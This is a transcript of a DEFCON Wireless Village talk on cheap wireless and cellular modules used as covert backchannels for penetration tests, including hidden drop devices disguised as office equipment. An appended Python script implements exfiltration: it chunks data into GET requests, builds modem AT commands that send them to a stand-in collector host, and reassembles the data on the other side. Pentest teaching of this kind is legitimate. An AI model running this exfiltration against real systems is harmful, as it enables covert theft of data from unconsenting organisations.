WIRELESS VILLAGE - Can you hear me now (DEFCON)? Wireless communication for pentesters

Video in TIB AV-Portal: WIRELESS VILLAGE - Can you hear me now (DEFCON)? Wireless communication for pentesters

License: CC Attribution 3.0 Unported
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.

Abstract
Using cheap commodity RF hardware to act as secure or backchannel communications for security research and pen tests. Wireless communication is getting cheaper, and hobby projects are integrating long-range, low-power communication to link devices in all sorts of unique ways. But what about in the world of information security? This talk will cover the acronym soup of current communication systems, including LoRa, RFM, satellite, ASK and many others, to identify which protocols make sense when you are trying to communicate either stealthily or in remote areas. In addition, this talk will cover how to improve the reliability of wireless communication and the costs associated with building your super pen test box, or perhaps even what evil things can be done with these and how to protect yourself. The aim of this talk is to be interactive and allow people to share experiences.
Um, all right, welcome to Wireless Village. I'm going to be giving you guys a brief rundown in a second on the various IoT communication forms that exist now and what you can do with them, so come join me on a journey. About me: my name is
Wasabi, Spicy Wasabi. The reason I'm speaking here today is because there is another Wasabi in the room, and it's Frustrated Wasabi, so if you're around now, make sure to see me at the end. If not, that's the reason why I'm speaking here today, but also to give you guys some interesting information about embedded devices and wireless communications. And if you're not interested in wireless communications here, please, you've come to the wrong place. But anyway, I've focused on embedded things, Internet of Things and all sorts of things for the last four years. I have participated in a bunch of competitions related to embedded devices and security and all sorts of things like that, and that's led me down a path of looking at what you can do with embedded devices that exist nowadays and how you can get them to do what you want. So what we'll be looking at today is the existing
technologies that are out there, the possible uses and challenges of those technologies, and what types of protocols are in use today. We'll also be looking at some of the radios and microcontrollers you can pick from to do what you want to do, but it's up to you what you pick for all this, obviously. So let's get started. Way back
when, if you wanted to send data out of a network, you're doing a penetration test or you're doing something along those lines, you will have the need to get out of the network, and in the old days that was, and is still, heavily used: you're doing some sort of exfiltration using the network, you're on the network as it is, and that's great. It works pretty well because most, you know, corporations, most businesses and places don't really secure their network very well. Some newer ones are also using 4G to allow you to communicate out. That's pretty good; it's, you know, a relatively large area of support you can use from. The problem is that it's not very stealthy. If someone's actively looking for you they will find you; even if they're, you know, monitoring DNS, if they're monitoring web traffic, you will not be undetected. Some of them do support passive tap capabilities, but for the most part they don't, so not very useful. Tried and proven
is Wi-Fi. If you want to send data out of a network, you use Wi-Fi. If you want to use a network, use Wi-Fi. It has pretty good pivot capabilities because you can just use any device you buy at the store, on eBay, and just let it connect in. Pretty great. It is sometimes capable of tapping a network because you're using basically a Linux computer to run your routing, so you have the capabilities down there. But again, it's not very long range and it's not necessarily very stealthy. If you're running, you know, "hacker net" and you're running a test, that doesn't really make it stealthy. But that comes into where
we're using wireless communications. So if you're familiar with wireless, you have half-duplex and full-duplex, and that's pretty good. So for half duplex you send data and then you receive the data; for full duplex you're sending and receiving more or less at the same time, which is great for us, because if you want two lines of communication you now have them both working actively. And hold on one second, I
Where is the presenter view? Okay, hold on one second, the monitors are misconfigured. And, all right, did the monitors just go away? Great. All right, cool. Technical difficulties are wonderful. The monitors have gone out.
Okay, yeah, the... oh, wrong view entirely.
Yeah, when does... is my problem. There we go.
Sorry about the delay. All right, so, okay, we're talking about duplex and half duplex. So what happens if we need just slow communication, we don't care about receiving and sending at the same time, we have the ability to just send data or receive it? A lot of IoT protocols use the method of half duplex because it's very efficient. Well, they don't even use just half duplex; they just have receive windows where the device is allowed to receive data, and all other times it's send only. So there's a lot of opportunities here for sending data, but the problem is, well, even Wi-Fi is half duplex, and so you may not necessarily notice a problem, but the general rule is, regardless of the
protocol, the more power you use, the more data you can send; the more data you send, the more power you need. If you're running on a battery, the problem is you're going to run out of power a lot quicker if you're sending a lot of data versus something that's, you know, smaller, more embedded. When you're using Wi-Fi, it uses more power than something that's designed specifically for low power use, such as IoT protocols. So, and you have to think about compression. You may not imagine it's a lot, but when you go from 128 bytes down to 64 bytes, that's a huge difference in the amount of data that you're sending and the duration that you can operate for these devices. So, very very quick
high-level overview of what wireless will look like. This is very simplified; there's a lot of different ways you can format data over a wireless signal, but the general idea is that you have high and low, sending data and receiving data, and you can have different ways to send it. You have a carrier and then you can do different encodings such as ASK, FSK, PSK, OFDM, all sorts of different formats. So that's good, but how would you implement some of these protocols? Well, you have the SDRs. Now these are
great for general use. SDRs are very very powerful, but they're big. They're getting smaller, but for the most part, if you're going to be using this, this is something very obvious: if you're gonna have a box that is an SDR and it has enough processing power to use an SDR, you're not looking at being very stealthy. Again, it is getting better,
though. This is the LimeSDR Mini. This is a pretty good device; I've actually been seeing some people use it over there. The problem with this device is that it does not support a lot of things that are just point and click, so if you're trying to do something quick, not necessarily true. And what I mean by point and click here is that you can program the FPGA and other components on there, but now you're developing for the hardware and it requires a little more knowledge versus just running the devices. And versus the full-blown SDRs, which are usually about $400, this one runs about $150, so it's very cheap and it's much smaller. So we're going on the right track. But of course there are
other methods of communication. This one was probably one of my favorites that I've seen. This is, we're going into ham radio here, and ham radio has been doing this sort of work for a very long time. In fact, I'd say they're probably the experts in implementing; if you're a ham radio operator, you're basically the expert in implementing communication over very small amounts of wireless bandwidth. And this computer over here is basically a TNC machine which is sending serial data over the radio, and it allows... so this technology is not new, but it is extremely useful and relevant. And why, you may be wondering? Well, what happens
if you're trying to get into, like, that power plant in the middle of nowhere? Well, you can't use Wi-Fi then, because you're not going to be just sitting in your car next to the wire there; the power plant can be like, hey, cool, I'm just here, you know, it's a nice place to sit down. You're gonna be far away where you're not getting detected, so that's good. But what happens if you're in a regular business? You know, can you hear
me here? So this is a look, this is an easier form, but why not make something that can be used for both? So now we've
got to get creative, and there's a lot of choices with these devices, because if
IoT is so popular, you can go from any preferred embedded device that you can work with. You can work with ZigBee; in the top, that's ZigBee. You can work with the silicon technologies modules that do 4G; they do all sorts of different communication ones. There's also the ESP modules. ESP modules are by far the cheapest modules that you can get if you need to throw them on anything. There's the ESP8266, or, I'm blanking on the name, but it is the 8285, ESP8285, that came to me. It is designed specifically for being very lightweight. It has embedded storage on it, so you can actually program it, have it running stuff and do a little bit of data storage while you buffer to send out if you need to. So that one's very good. But the things you have to think about are: what IO do you need? If you're connecting to an actual computer, do you have what you need to connect to that computer? Do you need to be stealthy? Do you need to be battery-powered? If it's battery-powered, you need to be able to relay the data; if you have a lot of data being sent and you're using all your battery, you're gonna lose power very quickly. So here's
one that I saw online. This is the WiFi Ducky. It's an open source project; it looks very open-source, but it's very powerful, and this is the type of stuff that is very exciting to me, because this is someone taking multiple components, putting them together and building something that is actually very useful for work. But the only problem with this device, and obviously it's easy to fix if you build an enclosure, is it looks somewhat sketchy. If you were to plug this into someone's computer to drop a payload, they're probably going to notice, and that's problematic. And the other problem with this is it doesn't have full communications: you can't receive data out. You can launch scripts, you can make it pivot over the network, but once you've executed the commands and you've triggered it from wireless, it's not sending data back to you. And again, the problem is you don't
want, you don't want the part of this dance group coming out to see you when you're doing a pen test, so we need something a little more subtle. That's
where you get into the microcontrollers. The microcontrollers nowadays are very very good. You obviously, again, ESP modules, they're super cheap; that's why you're going to see them again and again for every device, really, that you're gonna see. The other thing you may see is narrow, I think that's how I pronounce it. These devices are absolutely stunning. They're very very low-power, they have a HopeRF module built in, they have an Arduino built in. You just basically start flashing them and you have a device that can run over battery, relay information and do anything you need it to off of a very small package. In my test, this thing actually lasted for over, I think, two weeks doing timed communication, just running off of a small little battery. That's pretty good. But there's
others. If you need something a little more powerful and you, instead of using a full computer, you want to just embed, and you want to have one device that you can just drop in, that's where the systems on a chip come in. Linux has been getting on smaller and smaller devices for a long time now, and the hobbyist community has been growing. So the top device is the VoCore. How many people have heard of a VoCore before? Okay, more than I actually expected. For those of you who aren't aware of what the VoCore is, it's a very cheap embedded system-on-a-chip device that's running OpenWrt, and they've exposed all the I/O lines out, so basically what you can do is you can add radios, you can add other communication mediums. It also has Wi-Fi built in, so that's good, and it's pretty powerful. It again runs Linux, so you can embed things on it and make it do things, and it's about ten dollars. The other one is the Orange Pi. Orange Pis are very interesting. The interesting thing about Orange Pis is they basically run a stock kernel now, and they're a fairly powerful processor, they're running about one gigahertz, so it's basically running a Raspberry Pi in a little tiny dongle that has Ethernet, Wi-Fi and I/O that you can access. So if you're needing something that you need to just embed into something small, these things are the size of, are smaller than, the Raspberry Pi. So, you know, we can do a lot
of stuff. Communication is important, and we're gonna get into how and what technologies work for different situations. I went through and started going on eBay a while ago and went through and bought every single wireless module I could find. Some of them work better than others, as you will see, and it turns into a very interesting experience when you're trying to deal with some of these devices. There's some quirks that exist; if anybody's done any hobbyist or IoT development, you'll start seeing things where the radios don't work as expected in every situation. So how were these radios tested? This was done last year. I started getting all these modules, and what I did was I started going farther and farther with about a thousand packets as a test. They were sent over a short period of time. The packets were a normal format that was used across every single radio, so if one works better than the other, it's not a difference in the packet that was being sent; there's no time difference, there's no different data for each packet, it's all the same. And I was testing range and the signal quality being sent and received by each of the devices. So
we're back to ESP modules again. They are very powerful. They use about 70 milliamps of power. If you're plugged into a real device, that doesn't matter, but if you're running off of mobile, you're trying to relay information, this gets a little problematic. They use about 60 milliamps spiked in addition, so it goes up to about 80 milliamps, 85 milliamps, when you're powering up, so if you're running on an extremely low power battery you could reset the device and then you will lose the capability. It also uses that amount of power for three to five seconds as it's doing DHCP, so every time you need to connect, and as it refreshes the lease, it will be using more power. It has a fairly high transmit draw instead of receive. So, it's good; they're reliable in the sense that they are everywhere, they're cheap, and if you buy one and you buy another one from another vendor, they're still going to work the same. They speak Wi-Fi, and that's something that's good about them, is that they are so standardized. The ESP32 is another
interesting technology from Espressif. It's a dual-core version; it's pretty common now. The problem that I've found with the ESP32 is that it has a low-power core, it's one of its selling points, and so far I have not seen anyone successfully implement the low-power core except for one person who was writing raw assembly in a C struct, too, and then writing that directly to the microcontroller. It's very complicated in that case, and that's not ideal for something that we're trying to just apply quickly. And again, they have their very low power; the ESP32s are actually slower by a couple of seconds to connect via DHCP every time. You can set them statically, but it's not necessarily ideal, and then again, they also have the high transmit draw when they're working.
But then we get to LoRa. If you've done anything in the embedded protocol range, LoRa is a very powerful protocol. It's sub-gigahertz in most cases; there's a couple of different ranges that it works in, but it by default has a one to two mile range. It's licensed. It's designed off of some technology called chirp spread spectrum; that's how it does what it does with the range. It's used in not only raw radios, but it's also used for, in some cases, people have been experimenting with satellite communication using LoRa, which opens up a lot of possibilities. If you design a device that's going to use LoRa for communication and you add in satellite implementations, you don't have to rewrite everything that you're implementing in the first place. So there it is, just the lower level. Then there's the actual protocol implementations; there's a couple of them, LoRaWAN and Haystack. These are both implemented by licensing, and they have a couple of different specific changes that they do versus how you transmit to them or receive from them. Again, LoRa is the PHY implementation, and it uses about 30 milliamps to receive and about 100 milliamps to transmit, so we're looking at something that's very very low; if you're running on battery, this thing can go for a very long time. So LoRaWAN:
it's self-configuration and join. You just build a device, you build it, it's gonna join to the LoRaWAN network. Now where is the LoRaWAN network? Well, interestingly, it's all around us if your city supports it. They're slowly rolling out to different cities. It's much like a cellular network in the sense that you have to have coverage where you're going to be deploying; in the middle of nowhere, you're not going to have coverage. LoRa will still work, but LoRaWAN will not. It's encrypted with 128-bit, but it's not necessarily the most effective encryption; if you've looked online, there's problems with their encryption implementation. It supports OTA configuration, uploading and downloading. There's several different implementation classes if you want to use LoRaWAN. If you're trying to send only, that's Class A. It has two timed windows every so often, I forget if it's a day or a week, but there's two windows where it will pull updates to reconfigure itself; otherwise it's just gonna sit there and send all the data, and you have no idea if you're gonna ever get it back. Class B has higher downlink speeds but otherwise is unchanged. Class C is always listening except when it's transmitting, so that's where you go into the half duplex. Class C seems like the best option to do, but there's also problems with having availability in the windows that you're transmitting for the LoRaWAN implementation. Oh okay, just
change any room? There is a small licensing cost for anything that's used with LoRa. It's not very big, but it is something that exists. So Wi-Fi is free; LoRa is not completely free. So
you also have Sigfox. It's both a protocol and a company. Sigfox, Sigfox is very interesting because there's a module cost, there's a licensing fee to have the module modem, there's also a service fee for the modem, so you're constantly paying money to use this. And it is primarily transmission only, and only in areas that Sigfox has covered, so if you're trying to use this in areas where you are long range, even though it has a longer range than LoRa, you may not be able to get reception. And it has the transmission usage of LoRa: it only uses about 40 milliamps during transmit, and it can send a whopping 14 bytes at 600 bits per second. So, you know, you're talking a lot of data here. Unfortunately for us, that probably isn't good enough, but if you need something that's just ping back and say hey, I'm still here, that does work. It has a continuous TX mode, which is good if you're just trying to, you know, do location. But again, the licensing fees really
kill it. DASH7 is supposed to be the solution to both LoRa and Sigfox. It's an open alliance, open platform. It also uses sub-gigahertz communication. It only uses about 10 milliamps to receive, and you can run your own nodes to receive data from, so you can implement something that goes over any radio protocol from this if you need to use it. That's really good. The only problem is the documentation is a bit sparse on it; if you're trying to implement something using it, you have to go to someone who already implements it, a vendor, and that's a little expensive, because usually if we're doing some kind of pen test it's one-offs, not thousands. So what else can we
look at? Well, here is probably one of my favorite modules if you're doing some kind of communication pen test, or you need to communicate during a pen test where you can't use Wi-Fi or any other communications. The HC-12 is this amazing little module that you can buy off eBay. It's cheap, it works very well. They come in pairs, and as long as you're using the pairs, they can work up to about 3,000 feet distance in range. They're very very powerful. They have a built-in microcontroller on them that you can configure. They communicate over raw serial, so basically you can plug them into anything and they will just work; they will send and receive data, and you'll be sending and receiving serial data, which is great, because now you're not using super slow bandwidth when you're on serial. So if you need data, information out, or something else that you're getting, it's slow but it's manageable. The cool thing about these radios is that they're very small. The bad thing about these radios is that no two pairs are alike. If you're going to buy a lot of them, be prepared to buy double. When I was doing the tests on these, I would buy one, I would receive it, and I could not get them to communicate. I couldn't figure out why they were not communicating, and I would go through, I'd try to see why it wasn't working. They'd both turn on, they'd both say they were configuring and sending data or receiving data; nothing would come out. And it occurred to me finally: let me turn on my HackRF and just take a look. What it turned out to be was the crystals on these chips are not quite up to par, not to our liking, so what happens is you get offsets that are just enough that you will not be able to communicate over these devices. So they work great in pairs, because the same crystals are used, but you have to keep your eye on what crystals are used; they have markings on them. So these are very good, but be prepared to buy a lot of them. And on a similar note, the
nRF24 modules are very good, but they also have the same crystal problem: no two crystals are alike. Luckily these are a little easier to remove the crystal from, but they also, if you buy them in pairs, which they normally come with, they'll work great, but if you try to get them working in a mesh mode, which is something they actually support, you will have a problem, because none of them are genuine, usually. They fake the markings fairly well, but if you look at them through either a microscope or something like that, you'll see trace differences, so you're never necessarily getting a genuine one. So they're using parts, sometimes different. The really cheap ones are very obvious when you get a fake one, because they'll be missing resistors or other components that are actually fairly important on a radio, but they don't have them. But if you get one of the fairly good ones, they may still be fake, but the crystals may not be up to par again. So these are very good, but be prepared to buy a couple of them until you get pairs that work. The one nice thing about the nRF modules is they also support both Linux and Arduino natively; well, I guess Linux and Arduino support them natively, but not the other way around. But they're very good, and if you can get enough pairs that work, they support a very good mesh protocol, and they work for about 500 to 600 feet in my tests. But again, the crystals were what really killed it.
But if you're looking for something that just works and you don't have to pay licensing fees necessarily, the HopeRF modules: they support LoRa, which again, you're gonna have that license agreement, but they also support just regular RF transmission over a couple of different bands. I'm blanking on which ones they are right now, but they're very well documented. They support both Linux and Arduino too; again, both support them. It's $10 a module, but these things are appearing everywhere in the security community. If you have any of the DC Darknet badges, they use these; they've used them for the last couple of years, so they're definitely showing up in the community. They're very good modules, they're very good quality, and that's the difference between some of the other communication modules, is that these are actually very well built and you can use them pretty much anywhere and guarantee that if you're gonna get a mesh, they're gonna work; if you're gonna communicate point to point, they're going to work. They're SPI based, which isn't a big deal; if you're gonna use them on a regular computer, that makes it a little more complicated, but you can also get cheap modules to communicate over SPI to a regular computer, or use a Raspberry Pi or anything else. But that's about it, and they use about 50 milliamps, so they're fairly low powered. And then
let's go to simple if you want something that's literally just a throwable device you just want a radio you don't want something that does any of the you know protocol or anything else you just want something that transmits and ASX radios are very good at that they just transmit they are the more power you provide them they can go up to about 12 volts the more range you're going to get on them they are supported by virtual wire and Radiohead in Arduino you can also just write to them using Linux if you have any spare IO lines they have a max range of about 200 250 feet they're not spectacular but they're cheap you can buy a Pat n pack of them for less than 5 and they do work unlike the other ones they don't really have a crystal problem but they're just very cheap and not very good I have three different versions of just cheap ASX radios the ones on the bottoms are the ones you're gonna see most common the one on the top left is the LR 43b if you're curious about it it is designed a little smaller it's very small package but it's it has a little bit better range it's bit a little bit better quality it doesn't have so much noise interference and then the other side is the H 3/4 C and that one also has good a better noise quality than the bottom one but they're not very good they they work at about 433 megahertz which is about the same frequency that you get when you get those cheap thermometers so they're not very fancy but they're not going to be detected because people in their offices or anywhere have those devices already so you can just transmit freely on those and then the ZigBee ZigBee is pretty
much showing up everywhere in IOT devices it's there's a couple of implementations based off the sig B's one of the implementations of 802 15-4 there's also 6lowpan they're all very low power and very low range usually you have a hub and other communication methods and the reason I'm putting on this on here even though it's such lower low range is the fact that you can use these to relay so if you've got control of an IOT device and it had ZigBee you can transmit out to another device and another device and if you have control along that path where they're all meshed together you can send it out even if you don't necessarily have control of the direct connection to the device that you're starting with so that makes it very good for that but again they're very low range there's um there's thread protocol which is made by Google it is encrypted I don't know of much that you can use with it that's open but it is something that also exists on the same frequency range and you may be thinking
why not just use satellites satellites really good you know you always have connection to a satellite it's out there up there the problem is that they're expensive very very very expensive for 28 dollars you can get 10 kilobytes of data so it's very good on the budget unfortunately for us that's not very good but the upside is that they are universally accessible the the other interesting about the satellite transmitters is they're fairly large this is the
smallest module I could find in the corner is the is a normal size module it's about it's basically the size of a small laptop that you transmit and those are small the smallest ones I found there they use a specific one satellites chain they're called rock box rock blocks they use the iridium Network and that's where you get that high cost there's other ones that you can use that are actually continuous uplink and downlink versus just sending data for a small fee those work but they are not very affordable it is 90 for 30 megabytes of data so you can use it but if you're using them you're probably you probably have quite a bit of money so what's the next best thing to cellular well I don't know what
that guy is wearing but it's cellular so
cellular is fairly good with this stuff the only problem is again you run into the problem where you're not in range of a cell tower or you're in a building where you don't have range if you're at DEFCON you know you've probably been noticing where the signals going out it's in many cases not someone actually trying to hack you what's happening is there's just so much communication going on here you're we're not getting any signal out and that's problematic and that's one of the problems that you can run into with these devices but there's a couple of protocols that exist you can communicate on different I'm gonna say protocols now but so you have 3G 4G 2g those are all the standard ones that most people have heard of but what's coming out now is cat zero cat one cat m1 and enbe IOT these are all over cellular networks they're getting deployed worldwide and they're really really useful for example cat zero and cat one they have limited messaging support but they have a dedicated basically serial downlink and uplink so you can send data continuously using a cellular network in the screen shot of the picture person holding it that's an cat one radio so they're very small and then NBI that's the bottom corner those are about 50 kilobits a second so very small but they're also it has higher latency but it's a lot bigger coverage I don't know why I mean I ot is gaining so much popularity but it is so if you can use it it's fairly deployed all over the world now and then if we go back to what most people use that's 4G and eventually 5g it's very flexible but you're gonna have to have a baseband you're gonna have to have all sorts of things if you get lucky you can actually use that commands on the modem but that's going to be very complicated and not necessarily very useful because you're gonna have to write a lot of driver support then you have to G and 3G they're really good because the protocol implementations of 2g and 3G actually support web requests directly over 
the modem you don't have to implement anything else you just use an ACK man to say hey get this page if that page has request parameters in it and you're now sending data out so it's a very good way of using it their end of life they should be all you know removed by around 2022 if I hear correctly but it just depends so don't rely on it but those are very useful now you can get the modules for very cheap they're about 30 bucks and you can just deploy them and go they they're fairly low power what
else is there ok so here's a breakdown I'm looking for the monitor over there here's a breakdown of the different protocols that are supported on cellular and the different data rates as you can see khatm supports more data no bits per second versus kilobits but then you don't necessarily need that and then this comes back to the half-duplex and full-duplex you can you can see where they come in where you can send more data or less but who provides it well
I'm only listening to these are the only two companies that got back to me Verizon t-mobile and all the others also say they support these you know NB IOT cat one and they will sell you a dev kits but it turns out they'll only sell them to you if you make thousands of units in your a corporation that can you can afford to do that so it's it's a little problematic these two on the other hand they replied to me very quickly they were able to give me information on how to use the protocols how to use the radios that we're going over cellular so that was very nice for for particle it's a little expensive they give you a free card but it's three megabytes included only 21 megabytes is a total of 40 cents so if you wanted to use 200 megabytes a month it's about 100 or you can just buy the one gig plan which is about 400 again it get the prices are steep for in the IOT communication protocols that are long range but they do work alright so
here's the dev kit the DEF kits are fairly cheap you can get them for about a hundred bucks actually if from 18t but they again unless you're planning on using you know only a little bit of data you have to be considerate of how much the the actual plan costs versus implementing them but what is the goal why why you know do this talk right here
well the goal is to implement something that does not get detected how good would it be if you go into your pen test and roll in a coffee maker that has Wireless you know 4G 3G or you know it's using Laura any of these communication protocols I've listed today and you just roll it in someone's like oh look a new coffee maker they won't suspect anything and then you have you know either Wireless or some other thing that it's plugged in it's monitoring and sending the data out via the IOT communications nobody's going to suspect a thing it's gonna sit there for a while probably you will never get it back but at least you have something now that's easily rolled in and so the goal here again is that we
want something that works that small not easily detected send you know the data out very easily we don't want to do a lot of implementation but we wanted to go remote and maybe send it multiple paths if we can do mesh it's also good and that's about it I hope this was a
good summary of the IOT shouldn't prayer communication protocols that exist today there's quite a few of them I know this has been mostly high-level for what was actually supported there's more stuff online that I've worked on that you can see but this hopefully will just give you an idea of what technologies you can use now and where you can use them it's up to you in the end but again hopefully this covers most of them that exist and if you have any questions feel free to find me at the end but thank you guys for being here today [Applause]
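The 2G/3G exfiltration path the speaker describes (the modem fetches a page itself, and the collected data rides along as request parameters) is simple enough to show end to end. The following is an added example, not code from the talk or from any project the speaker mentions. It assumes a SIMCom SIM800-series style HTTP AT command set (AT+SAPBR, AT+HTTPINIT, AT+HTTPPARA, AT+HTTPACTION, AT+HTTPTERM), a hypothetical collector URL, a placeholder APN, and a conservative URL length budget; the payload is constructed for the example. It shows both sides: the device side builds the chunked GET URLs and the AT script that drives the modem, and the collector side reassembles the chunks, tolerating out-of-order and duplicate arrivals.

```python
"""Exfiltration over a modem's built-in HTTP client via AT commands.

Added example, not from the talk. Assumptions (not from the talk):
SIM800-style HTTP AT commands, hypothetical COLLECTOR URL, placeholder APN,
MAX_URL chosen conservatively so the URL fits the modem's and any proxy's limits.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

COLLECTOR = "http://collector.example.net/t"   # hypothetical collector endpoint
APN = "internet"                               # placeholder; carrier-specific
MAX_URL = 512                                  # conservative URL budget (assumption)


def b64u(data: bytes) -> str:
    """URL-safe base64 without '=' padding so the chunk survives a query string as-is."""
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def unb64u(text: str) -> bytes:
    """Inverse of b64u: restore padding, then decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def build_urls(data: bytes, session: str, max_url: int = MAX_URL) -> List[str]:
    """Split data into GET URLs, one chunk per query string.

    Parameters: s = session id, i = chunk index, n = chunk count, d = base64url chunk.
    Indices are fixed-width so every chunk gets the same byte budget.
    """
    skeleton = f"{COLLECTOR}?" + urlencode({"s": session, "i": "9999", "n": "9999", "d": ""})
    avail = max_url - len(skeleton)
    if avail < 4:
        raise ValueError("max_url too small for even one base64 group")
    raw_per_chunk = (avail // 4) * 3            # 3 raw bytes -> 4 base64 chars
    chunks = [data[i:i + raw_per_chunk] for i in range(0, len(data), raw_per_chunk)] or [b""]
    if len(chunks) > 9999:
        raise ValueError("payload needs more than 9999 chunks")
    return [
        f"{COLLECTOR}?" + urlencode(
            {"s": session, "i": f"{i:04d}", "n": f"{len(chunks):04d}", "d": b64u(c)})
        for i, c in enumerate(chunks)
    ]


def at_script(urls: List[str], apn: str = APN) -> List[str]:
    """AT command sequence for a SIM800-style modem to GET each URL in turn.

    The modem performs the HTTP request itself; the host only talks serial,
    which is the point the talk makes about 2G/3G modules.
    """
    cmds = [
        'AT+SAPBR=3,1,"Contype","GPRS"',
        f'AT+SAPBR=3,1,"APN","{apn}"',
        "AT+SAPBR=1,1",                 # open the GPRS bearer
        "AT+HTTPINIT",
        'AT+HTTPPARA="CID",1',
    ]
    for url in urls:
        cmds.append(f'AT+HTTPPARA="URL","{url}"')
        cmds.append("AT+HTTPACTION=0")  # 0 = GET; modem later reports +HTTPACTION: 0,<status>,<len>
    cmds += ["AT+HTTPTERM", "AT+SAPBR=0,1"]
    return cmds


_ACTION_RE = re.compile(r"^\+HTTPACTION: (\d+),(\d+),(\d+)$")


def parse_httpaction(line: str) -> Optional[Tuple[int, int, int]]:
    """Parse the unsolicited '+HTTPACTION: <method>,<status>,<datalen>' result line."""
    m = _ACTION_RE.match(line.strip())
    if not m:
        return None
    method, status, length = (int(g) for g in m.groups())
    return method, status, length


def reassemble(request_urls: List[str], session: str) -> bytes:
    """Collector side: rebuild one session's payload from the URLs it received.

    Tolerates out-of-order arrival and duplicate retries; raises if chunks are missing.
    """
    parts: Dict[int, bytes] = {}
    total: Optional[int] = None
    for u in request_urls:
        q = parse_qs(urlsplit(u).query)
        if q.get("s", [None])[0] != session:
            continue                    # another session's traffic
        idx, n = int(q["i"][0]), int(q["n"][0])
        total = n if total is None else total
        parts[idx] = unb64u(q.get("d", [""])[0])   # parse_qs drops an empty 'd='
    if total is None or len(parts) != total:
        raise ValueError(f"session {session}: have {len(parts)} of {total} chunks")
    return b"".join(parts[i] for i in range(total))


if __name__ == "__main__":
    sample = bytes(range(256)) * 4      # constructed 1024-byte payload
    urls = build_urls(sample, "a1b2")
    for cmd in at_script(urls):
        print(cmd)
    print(reassemble(urls, "a1b2") == sample)
```

On the wire this looks like a burst of GETs to one host with fixed-width numeric parameters and a high-entropy `d` value, which is what a collector or a proxy log would show; the talk's "coffee maker" point is that when the modem goes out over cellular, the target's own network never sees these requests at all, so the detection opportunity sits on the RF side, not in the corporate proxy.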